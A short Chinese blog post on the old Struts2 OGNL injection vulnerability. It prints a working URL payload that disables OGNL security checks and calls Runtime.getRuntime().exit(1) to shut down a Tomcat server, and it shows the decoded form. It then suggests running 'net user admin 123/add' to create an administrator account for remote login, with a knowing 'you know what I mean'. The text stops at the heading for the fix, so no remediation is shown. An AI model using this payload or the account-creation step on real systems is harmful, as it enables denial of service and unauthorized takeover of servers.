Strusts2的低版本漏洞相信大家都知道了,前几天的时候尝试了一下,果然危害极大
其实不用知道太多,我们只需要知道
?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1
会转换成:
?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1
这就等价于:
java.lang.Runtime.getRuntime().exit(1);
也就是说的关闭当前tomcat
当然我们也可以使用net user admin 123/add +****
这样的话我们就可以获得远程登录权限....,你懂的。
解决办法如下: